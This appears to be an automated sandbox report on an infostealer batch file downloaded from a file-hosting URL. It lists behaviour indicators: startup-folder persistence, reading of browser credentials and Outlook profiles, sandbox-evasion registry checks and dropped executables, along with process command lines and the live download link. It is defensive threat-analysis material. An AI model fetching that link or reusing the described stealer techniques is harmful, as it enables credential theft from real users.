hxxps://x0[.]at/FiPI[.]bat

Analysis

max time kernel
440s
max time network
604s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
19/07/2023, 04:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://x0.at/FiPI.bat

Score

8^/10

collection spyware stealer

Malware Config

Signatures

Downloads MZ/PE file

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation	FiPI (1).bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation	dSNTndeQXL.cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation	AccountChecker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation	AccountChecker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation	dSNTndeQXL.cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation	dSNTndeQXL.cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.exe	AccountChecker.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\updater.exe	taskmgr.exe

Executes dropped EXE 10 IoCs

pid	Process
3676	FiPI.bat.exe
3868	FiPI (1).bat.exe
2220	dSNTndeQXL.cmd.exe
1016	Qvowtgvuow.exe
1756	AccountChecker.exe
3688	AccountChecker.exe
1616	AccountChecker.exe
4764	AccountChecker.exe
2364	dSNTndeQXL.cmd.exe
1576	dSNTndeQXL.cmd.exe

Loads dropped DLL 13 IoCs

pid	Process
1016	Qvowtgvuow.exe
1016	Qvowtgvuow.exe
1016	Qvowtgvuow.exe
1756	AccountChecker.exe
1756	AccountChecker.exe
3688	AccountChecker.exe
1616	AccountChecker.exe
4764	AccountChecker.exe
3688	AccountChecker.exe
3688	AccountChecker.exe
3688	AccountChecker.exe
3688	AccountChecker.exe
1756	AccountChecker.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	dSNTndeQXL.cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	dSNTndeQXL.cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
4508	tasklist.exe
3956	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5064	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133342154637968118"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings	FiPI (1).bat.exe

Opens file in notepad (likely ransom note) 5 IoCs

ransomware

pid	Process
4848	NOTEPAD.EXE
4384	NOTEPAD.EXE
1448	NOTEPAD.EXE
1280	NOTEPAD.EXE
4400	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2212	chrome.exe
2212	chrome.exe
3676	FiPI.bat.exe
3676	FiPI.bat.exe
3676	FiPI.bat.exe
1324	chrome.exe
1324	chrome.exe
3868	FiPI (1).bat.exe
3868	FiPI (1).bat.exe
3868	FiPI (1).bat.exe
2856	powershell.exe
2856	powershell.exe
5012	powershell.exe
5012	powershell.exe
2856	powershell.exe
5012	powershell.exe
2856	powershell.exe
2856	powershell.exe
3976	taskmgr.exe
3976	taskmgr.exe
3956	powershell.exe
3956	powershell.exe
3956	powershell.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3476	powershell.exe
3476	powershell.exe
3476	powershell.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
2220	dSNTndeQXL.cmd.exe
2220	dSNTndeQXL.cmd.exe
2220	dSNTndeQXL.cmd.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
5116	powershell.exe
5116	powershell.exe
1508	powershell.exe
1508	powershell.exe
5116	powershell.exe
1508	powershell.exe
3976	taskmgr.exe
5116	powershell.exe
5116	powershell.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3728	powershell.exe
3728	powershell.exe
3728	powershell.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3976	taskmgr.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
680	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
2212	chrome.exe
2212	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe
Token: SeShutdownPrivilege	2212	chrome.exe
Token: SeCreatePagefilePrivilege	2212	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
2212	chrome.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe
3976	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2212 wrote to memory of 3660	2212	chrome.exe	84
PID 2212 wrote to memory of 3660	2212	chrome.exe	84
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1944	2212	chrome.exe	87
PID 2212 wrote to memory of 1956	2212	chrome.exe	88
PID 2212 wrote to memory of 1956	2212	chrome.exe	88
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89
PID 2212 wrote to memory of 2320	2212	chrome.exe	89

outlook_office_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	dSNTndeQXL.cmd.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://x0.at/FiPI.bat
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcffb49758,0x7ffcffb49768,0x7ffcffb49778
  2⤵
  PID:3660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=360 --field-trial-handle=1872,i,11555198704929744065,10291899171089604458,131072 /prefetch:2
  2⤵
  PID:1944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1872,i,11555198704929744065,10291899171089604458,131072 /prefetch:8
  2⤵
  PID:1956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2208 --field-trial-handle=1872,i,11555198704929744065,10291899171089604458,131072 /prefetch:8
  2⤵
  PID:2320
- C:\Program Files\Google\Chrome\Application\chrome.exe
